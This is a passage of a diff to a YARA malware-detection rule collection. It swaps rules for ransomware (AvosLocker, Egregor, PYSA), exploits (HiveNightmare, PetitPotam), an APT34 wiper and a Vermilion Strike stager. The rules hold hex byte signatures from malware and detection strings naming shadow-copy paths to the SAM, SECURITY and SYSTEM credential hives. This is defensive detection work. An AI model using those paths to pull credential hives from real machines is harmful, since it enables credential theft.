-		$seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d }
-		$seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 }
+		$s1 = { be bd f8 40 00 41 55 49 89 fd bf a3 f8 40 00 41 54 55 53 48 81 ec 20 04 00 00 e8 4f cb ff ff 48 85 c0 48 89 c5 0f 84 af 01 00 00 48 8d 5c 24 20 41 bc 0a 00 00 00 41 be b0 32 40 00 66 90 48 89 ea be c8 00 00 00 48 89 df e8 30 cd ff ff 48 85 c0 0f 84 4f 01 00 00 80 7c 24 20 23 74 e0 bf b4 f8 40 00 48 89 de 4c 89 e1 f3 a6 75 d1 be d4 1d 41 }
+		$s2 = { 8b 43 14 8b 73 10 8b 4b 0c 8d 56 01 44 8d 80 6c 07 00 00 be 70 21 41 00 31 c0 e8 ed 34 ff ff 48 85 ed 74 28 8b 4b 04 8b 53 08 48 89 ef 44 8b 03 48 83 c4 08 be 79 21 41 00 5b 5d }
+		$s3 = { 55 53 48 83 ec 70 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 40 48 89 44 24 08 8b 84 24 90 00 00 00 89 04 24 e8 22 fb ff ff e8 fd 58 ff ff e8 38 5a ff ff e8 f3 59 ff ff 0f 1f 00 e8 5b 5e ff ff 48 89 c7 e8 23 5b ff ff 48 89 c7 48 89 c5 e8 18 5f ff ff 48 8d 4c 24 50 31 d2 be 6e 00 00 00 48 89 c7 48 89 c3 e8 41 59 ff ff 48 8b 7c 24 50 31 c9 ba 04 00 00 00 be 21 00 00 00 e8 1b 60 ff ff 48 8d 54 24 2f 48 8d 7c 24 60 4c 89 e6 e8 d9 5c ff ff 48 8d 7c 24 60 ba 88 f8 40 00 be a7 20 41 00 e8 a5 1f 00 00 48 8b 4c 24 60 31 d2 be 64 00 00 00 48 89 df e8 f1 58 ff ff 31 c9 31 d2 be 65 00 00 00 48 89 df e8 e0 58 ff ff 48 85 c0 7e 73 48 8b 7c 24 50 e8 41 58 ff ff 8b 54 24 30 48 8b 74 24 40 48 89 df e8 50 59 ff ff 48 8b 7c 24 40 e8 66 12 00 00 48 8b 94 24 a0 00 00 00 48 8b b4 24 98 00 00 00 48 89 df e8 0e fd ff ff 48 89 df e8 b6 5f ff ff 48 89 ef e8 ce 58 ff ff b8 01 00 00 00 48 8b 54 24 60 48 8d 7a e8 48 81 ff c0 54 61 00 75 23 48 83 c4 70 5b 5d 41 5c c3 66 0f 1f 44 00 00 48 89 df e8 80 5f ff ff 48 89 ef e8 98 58 ff ff 31 c0 eb cb be b0 32 40 00 48 8d 4f 10 48 85 f6 74 3d 83 ca ff }
+		$s4 = { 8b 15 6e e4 20 00 31 ff be e0 57 61 00 e8 0a b8 ff ff 48 89 c7 31 c0 48 85 ff 74 17 48 89 3d e9 e4 20 00 e8 a4 bf ff ff 89 05 e6 e4 20 00 b8 01 00 }
+		$s5 = { b8 02 00 00 00 48 89 fb 48 83 ec 10 66 89 04 25 00 00 00 00 e8 a6 4e ff ff 83 f8 ff 89 04 24 74 16 89 04 25 04 00 00 00 b8 01 00 00 00 48 83 c4 10 5b c3 0f 1f 40 00 48 89 df e8 f0 4e ff ff 48 89 c1 31 c0 48 85 }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 300KB and 7 of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 30KB and 4 of them
 }
-rule ARKBIRD_SOLG_RAN_Avoslocker_July_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Stager_Vermilion_Strike_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware"
+		description = "Detect the windows version of the stager of Vermilion Strike implant"
 		author = "Arkbird_SOLG"
-		id = "3fbc707f-9802-54bc-933b-bc4c4953b1d0"
-		date = "2021-07-23"
-		modified = "2021-07-24"
-		reference = "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/AvosLocker/RAN_AvosLocker_July_2021_1.yara#L1-L23"
+		id = "7a8ae258-1fb4-5a24-b69e-3a632e00bfae"
+		date = "2021-09-14"
+		modified = "2021-09-16"
+		reference = "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-15/Vermilion_Strike/MAL_Stager_Vermilion_Strike_Sep_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "e2291f574b5ab68e901a76b6511e0ee4c1eee51d5e3eced62bf68ceedb061958"
-		score = 75
+		logic_hash = "cc4d59c92faba1f3435c8454071a1e1c60b6339393796c76e64b890bb85d13cc"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
-		hash2 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "3ad119d4f2f1d8ce3851181120a292f41189e4417ad20a6c86b6f45f6a9fbcfc"
+		level = "experimental"
+		tlp = "White"
+		adversary = "Vermilion Strike"
 
 	strings:
-		$s1 = { 64 72 69 76 65 20 25 73 20 74 6f 6f 6b 20 25 66 20 73 65 63 6f 6e 64 73 0a 00 00 00 25 63 3a 00 64 72 69 76 65 3a 20 25 73 }
-		$s2 = { 63 6c 69 65 6e 74 5f 72 73 61 5f 70 72 69 76 3a 20 25 73 0a }
-		$s3 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 2d 2d 2d 2d 2d 45 4e 44 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d }
-		$s4 = { ff 35 b8 2c 46 00 88 9d 7c ef ff ff e8 3c 56 02 00 50 8d 85 71 ef ff ff 50 e8 c5 9e ff ff 83 c4 0c 8d 85 94 ef ff ff 50 53 53 68 14 01 00 00 ff 35 b8 2c 46 00 ff b5 90 ef ff ff ff 15 00 a0 44 00 85 c0 0f 85 cd 00 00 00 8b 35 48 a0 44 00 8d 85 98 fe ff ff 53 68 ff 00 00 00 50 68 00 04 00 00 ff d6 50 53 68 00 10 00 00 ff 15 44 a0 44 00 b1 3e c7 85 70 ef ff ff 3e 7b 6c 6c c7 85 74 ef ff ff 71 6c 04 1e 8b c3 c7 85 78 ef ff ff 1b 4d 34 00 30 8c 05 71 ef ff ff 40 83 f8 0a 73 08 8a 8d 70 ef ff ff eb eb 8d 85 98 fe ff ff 88 9d 7b ef ff ff 50 8d 85 71 ef ff ff 50 e8 23 9e ff ff 0f 28 05 00 8b 45 00 59 0f 11 85 48 ef ff ff 59 0f 28 05 40 8b 45 00 8b cb 0f 11 85 58 ef ff ff 66 c7 }
-		$s5 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 a6 ca ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 48 a1 44 00 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b }
-		$s6 = { 4d 61 70 3a 20 25 73 0a 00 00 00 00 65 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6e 00 67 00 20 00 25 00 6c 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 }
-		$s7 = { 44 6f 6e 65 21 21 0a 00 25 66 20 73 65 63 6f 6e 64 73 0a }
-		$s8 = { 56 68 01 00 00 08 6a 01 52 ff 15 14 a0 44 00 85 c0 0f 84 97 00 00 00 8d 45 f8 50 53 53 6a 06 53 ff 36 8b 1d 20 a0 44 00 ff d3 85 c0 74 73 ff 75 f8 e8 3b a7 01 00 a3 b8 2c 46 00 59 85 c0 }
+		$s1 = { a1 b0 62 41 00 33 c4 50 8d 84 24 d0 00 00 00 64 a3 00 00 00 00 8b da 8b 84 24 ec 00 00 00 8b b4 24 e0 00 00 00 8b bc 24 e4 00 00 00 8b ac 24 e8 00 00 00 8d 54 24 2c 52 89 44 24 28 89 4c 24 2c e8 95 f0 ff ff 33 c0 89 84 24 d8 00 00 00 c7 84 24 88 00 00 00 0f 00 00 00 89 84 24 84 00 00 00 88 44 24 74 6a 17 68 fc 3b 41 00 8d 44 24 78 c6 84 24 e0 00 00 00 01 e8 9e 0b 00 00 6a 02 68 14 3c 41 00 8d 44 24 78 e8 8e 0b 00 00 6a 00 6a 00 6a 00 6a 01 55 ff 15 44 21 41 00 8b e8 55 6a 02 57 53 8b ce 89 6c 24 2c e8 8d fc ff ff 83 c4 10 6a 00 6a 00 6a 03 6a 00 6a 00 53 56 55 ff 15 58 21 41 00 6a 00 68 00 82 80 80 6a 00 6a 00 6a 00 57 68 f8 3b 41 00 50 89 44 24 40 ff 15 4c 21 41 00 }
+		$s2 = { 64 a1 00 00 00 00 50 83 ec 60 a1 b0 62 41 00 33 c4 89 44 24 58 53 55 56 57 a1 b0 62 41 00 33 c4 50 8d 44 24 74 64 a3 00 00 00 00 8b 84 24 88 00 00 00 8b ac 24 84 00 00 00 8b f9 89 44 24 18 33 c0 8d 4c 24 1c 51 8b f2 33 db 89 44 24 30 89 44 24 34 89 44 24 38 89 44 24 3c 89 44 24 40 89 44 24 44 89 44 24 48 89 44 24 4c 89 44 24 50 89 44 24 20 89 44 24 24 89 44 24 28 89 44 24 2c ff 15 2c 21 41 00 85 c0 74 21 39 5c 24 1c 74 05 bb 01 00 00 00 8b 44 24 20 }
+		$s3 = { 50 56 8d 4c 24 58 e8 fc f2 ff ff 6a 01 8d 54 24 18 52 8d 44 24 58 50 89 9c 24 88 00 00 00 33 c0 c6 44 24 20 3d e8 0d 01 00 00 83 f8 ff 74 4f 80 bc 24 8c 00 00 00 00 74 16 56 bb 18 3c 41 00 8d 7c 24 54 e8 8f fd ff ff 83 c4 04 84 c0 75 2f 56 bb 20 3c 41 00 8d 7c 24 54 e8 79 fd ff ff 83 c4 04 84 c0 75 19 56 bb 28 3c 41 00 e8 67 fd ff ff 83 c4 04 84 c0 74 07 c7 45 00 04 00 00 00 83 7c 24 68 10 72 19 }
+		$s4 = { 8d 44 24 18 50 8d 4c 24 18 51 6a 1f 53 c7 44 24 28 04 00 00 00 ff 15 3c 21 41 00 81 4c 24 14 00 01 00 00 6a 04 8d 54 24 18 52 6a 1f 53 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 30KB and 3 of them
 }
-rule ARKBIRD_SOLG_Exp_CVE_2021_36934_July_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect CVE_2021_36934 exploit (HiveNightmare)"
+		description = "Detect Egregor / Maze ransomware by Maze blocks"
 		author = "Arkbird_SOLG"
-		id = "3a0ed4f7-8a99-569f-a636-4cd64c2121bb"
-		date = "2021-07-23"
-		modified = "2021-07-23"
-		reference = "https://github.com/GossiTheDog/HiveNightmare"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/HiveNightmare/Exp_CVE_2021_36934_July_2021_1.yara#L1-L23"
+		id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f"
+		date = "2020-10-29"
+		modified = "2023-11-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "2fd6cdf8a81f239473716d2c10a1754ebb2c60099eebd9d0cc1450ad3441075b"
+		logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		hash1 = "0009d4950559b508353b951a314c5ac0aaae8161751017d3d4681dc805374eaa"
-		hash2 = "7baab69f86b50199456c9208624dd16aeb0d18d8a6f2010ee6501a183476f12f"
-		hash3 = "9035f88894a937892c63ac9a3c6c16301c7ecea7c11cf31d0fd24c39f17c8c2f"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4"
+		hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d"
+		hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb"
+		hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345"
 
 	strings:
-		$s1 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" fullword wide
-		$s2 = "Windows\\System32\\config\\SECURITY" fullword wide
-		$s3 = "Windows\\System32\\config\\SYSTEM" fullword wide
-		$s4 = "Windows\\System32\\config\\SAM" fullword wide
-		$s5 = "SECURITY-" fullword wide
-		$s6 = { 43 6f 75 6c 64 20 6e 6f 74 20 6f 70 65 6e 20 53 45 43 55 52 49 54 59 20 3a  }
-		$s7 = { 7a d1 3f 99 5c 2d 21 79 f2 21 3d 00 58 ac 30 7a b5 d1 3f 7e 84 ff 62 3e cf 3d 3d }
+		$x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 }
+		$x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 }
+		$x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 }
+		$op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 }
+		$op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 }
+		$op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 }
+		$op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and ( 3 of ( $op* ) or 2 of ( $x* ) )
 }
-rule ARKBIRD_SOLG_Exp_Petitpotam_July_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_PYSA_Sept_2021_1 : FILE
 {
 	meta:
-		description = "Detect PetitPotam exploit (local exploit version)"
+		description = "Detect the PYSA ransomware"
 		author = "Arkbird_SOLG"
-		id = "dd23c77d-9929-5130-aad8-2bcc0a7dcbaa"
-		date = "2021-07-23"
-		modified = "2021-07-24"
-		reference = "https://github.com/topotam/PetitPotam"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20.21-07-23/PetitPotam/Exp_PetitPotam_July_2021_1.yara#L1-L24"
+		id = "fd939287-ec37-5021-9782-f0f86a9f0e4b"
+		date = "2021-09-23"
+		modified = "2021-11-10"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/PYSA/RAN_PYSA_Sept_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "a33a1dc2a3593063de2b65e01a770ff5c72ad360d88efdca588eacb8817fb91d"
+		logic_hash = "e16f2ae581b8627ccd4e8ecb56db52c992022473d006843ed19a69c8059ecb54"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
-		hash1 = "10cbadc2c82178d3b7bdf96ab39b9e8580ee92c2038728b74d314e506c7a9144"
+		hash1 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14"
+		hash2 = "7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14"
+		hash3 = "44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9"
 		tlp = "white"
-		adversary = "-"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = "\\pipe\\lsarpc" fullword wide
-		$s2 = { 5c 00 5c 00 25 00 73 00 5c 00 [4-12] 5c 00 [4-12] 00 2e 00 65 00 78 00 65 }
-		$s3 = { 5c 00 5c 00 25 00 73 00 00 00 00 00 6e 00 63 00 61 00 63 00 6e 00 5f 00 6e 00 70 }
-		$s4 = { 23 46 69 6c 65 20 45 72 72 6f 72 23 28 25 64 29 20 3a }
-		$s5 = { 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 20 61 74 20 66 69 6c 65 20 25 68 73 20 6c 69 6e 65 20 25 64 }
-		$s6 = { 50 e8 06 95 ff ff 83 c4 10 c7 85 00 ff ff ff 00 00 00 00 8b 85 00 ff ff ff 50 8d 8d 0c ff ff ff 51 8d 55 dc 52 8b 45 f4 50 e8 4e 7a ff ff 83 c4 10 89 45 e8 83 7d }
-		$s7 = "Attack success!!!\n" fullword wide
-		$s8 = { 8b 43 0c 56 83 e8 24 8d 73 20 50 56 8d 45 b4 50 8d 45 e8 50 e8 02 02 00 00 68 b8 52 4f 00 8d 45 b4 50 68 bc 52 4f 00 8d 45 e8 50 8b 43 0c 68 c0 52 4f 00 ff 75 10 83 e8 24 68 cc 52 4f 00 50 68 00 53 4f 00 56 68 0c 53 4f 00 68 20 53 4f 00 68 78 53 4f 00 8d 85 c0 fe ff ff 68 f4 00 00 00 50 e8 4e 91 ff ff 83 c4 4c 8d 85 c0 fe ff ff 50 6a 04 }
-		$s9 = { 25 73 25 73 25 70 25 73 25 7a 64 25 73 25 64 25 73 25 73 25 73 25 73 25 73 }
-		$s10 = { 25 00 6c 00 73 00 28 00 25 00 64 00 29 00 20 00 3a 00 20 00 25 00 6c 00 73 }
+		$s1 = { 57 ff 15 38 a0 45 00 be [2] 45 00 33 ff 56 57 68 01 00 1f 00 ff 15 34 a0 45 00 85 c0 75 2b 56 57 57 ff 15 30 a0 45 00 57 8b f0 e8 44 00 00 00 6a 01 e8 3d 00 00 00 59 59 e8 3f ff ff ff 56 ff 15 2c a0 45 00 }
+		$s2 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 8d 45 f8 50 6a 02 6a 00 68 [2] 45 00 68 02 00 00 80 ff 15 0c a0 45 00 8b 15 bc 50 47 00 8b ca 8d 71 01 8a 01 41 84 c0 75 f9 2b ce 8b 35 08 a0 45 00 8d 41 01 50 52 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 6a 05 68 [2] 45 00 6a 07 6a 00 68 [2] 45 00 ff 75 f8 ff d6 ff 75 f8 ff 15 10 a0 45 00 8b 4d fc 33 cd 5e e8 [2] 02 00 }
+		$s3 = { 57 8d 85 f8 fe ff ff bb 04 01 00 00 50 53 ff 15 48 a0 45 00 8d bd f8 fe ff ff 4f 8a 47 01 47 84 c0 75 f8 be [2] 45 00 8d 85 f4 fd ff ff 53 50 33 db a5 53 a5 66 a5 a4 ff 15 74 a0 45 00 8b cb 8a 84 0d f4 fd ff ff 88 84 0d f0 fc ff ff 41 84 c0 75 ed 8d 85 f0 fc ff ff 6a 5c 50 e8 [2] 02 00 59 59 85 c0 74 02 88 18 53 68 80 00 00 00 6a 02 53 53 68 00 00 00 40 8d 85 f8 fe ff ff 50 ff 15 1c a0 45 00 8b f8 83 ff ff 0f 84 a7 00 00 00 b9 78 50 47 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 95 f4 fd ff ff 8d 72 01 8a 02 42 84 c0 75 f9 2b d6 8d b5 f8 fe ff ff 8d 5e 01 8a 06 46 84 c0 75 f9 2b f3 83 c1 14 8d 04 56 03 c1 e8 [2] 02 00 8b f4 8d 85 f8 fe ff ff 50 8d 85 f0 fc ff ff 50 8d 85 f4 fd ff ff 50 50 68 78 50 47 00 56 ff 15 a0 a1 45 00 8b ce 83 c4 18 8d 51 01 8a 01 41 84 c0 75 f9 33 db 8d 85 ec fc ff ff 53 50 2b ca 51 56 57 ff 15 88 a0 45 00 57 ff 15 7c a0 45 00 53 53 53 8d 85 f8 fe ff ff 50 68 [2] 45 00 53 ff 15 94 a1 45 00 8d a5 e0 fc ff ff 5f 5e 5b 8b }
+		$s4 = { 51 a1 34 52 47 00 33 c5 89 45 fc 56 68 [2] 46 00 68 [2] 46 00 68 [2] 46 00 6a 11 e8 c6 fb ff ff 8b f0 83 c4 10 85 f6 74 12 ff 75 0c 8b ce ff 75 08 ff 15 a8 a1 45 00 ff d6 eb 14 6a 00 ff 75 0c ff 75 08 ff 15 4c a1 45 00 50 e8 d6 00 00 00 8b 4d fc 33 cd 5e e8 [2] fe ff 8b e5 }
+		$s5 = { 8b ec 6a ff 68 [2] 45 00 64 a1 00 00 00 00 50 83 ec 44 a1 34 52 47 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 3d 04 a0 45 00 68 00 00 00 f0 6a 01 6a 00 6a 00 56 c7 06 00 00 00 00 ff d7 85 c0 75 60 ff 15 54 a0 45 00 6a 08 6a 01 6a 00 68 [2] 45 00 56 8b d8 ff d7 85 c0 75 46 6a 28 6a 01 50 68 [2] 45 00 56 ff d7 85 c0 75 35 53 ff 15 58 a0 45 00 68 [2] 45 00 8d 4d d8 e8 ?? 8a fd ff 8d 45 d8 c7 45 fc 00 00 00 00 50 8d 4d b0 e8 d3 00 00 00 68 [2] 47 00 8d 45 b0 50 e8 [2] 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 [2] 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 50KB and 7 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 100KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_APT34_Dustman_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_UNK_DEV_0322_Jul_2021_1 : CVE_2021_35211 FILE
 {
 	meta:
-		description = "Detect the Installer of Dustman wiper used by APT34"
+		description = "Detect the script used by DEV-0322 for create a new user after exploit the CVE-2021-35211"
 		author = "Arkbird_SOLG"
-		id = "071063f5-d2a4-5666-a8c4-283c02061f6d"
-		date = "2021-04-28"
-		modified = "2021-04-30"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-29/APT34/APT_APT34_Dustman_Apr_2021_1.yara#L1-L19"
+		id = "8d16eb7f-c137-5f23-8830-ce26dc6e4d52"
+		date = "2021-07-16"
+		modified = "2021-11-10"
+		reference = "https://www.cadosecurity.com/triage-analysis-of-serv-u-ftp-user-backdoor-deployed-by-cve-2021-35211/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-09/DEV_0322/UNK_DEV_0322_Jul_2021_1.yara#L1-L26"
 		license_url = "N/A"
-		logic_hash = "44e68fa21c1d6258bc9c0dcdc9cc531a15081122c90b23607bcfda716471aeb6"
+		logic_hash = "7d7f012053bff6217f0fe9087acbeba13f83cb2c3dbe9a4fe8e7e0e4551edefd"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "a9397eb9e95087db7e03239c689776d56c1450d685568564acd90e1532c78882"
+		quality = 59
+		tags = "CVE-2021-35211, FILE"
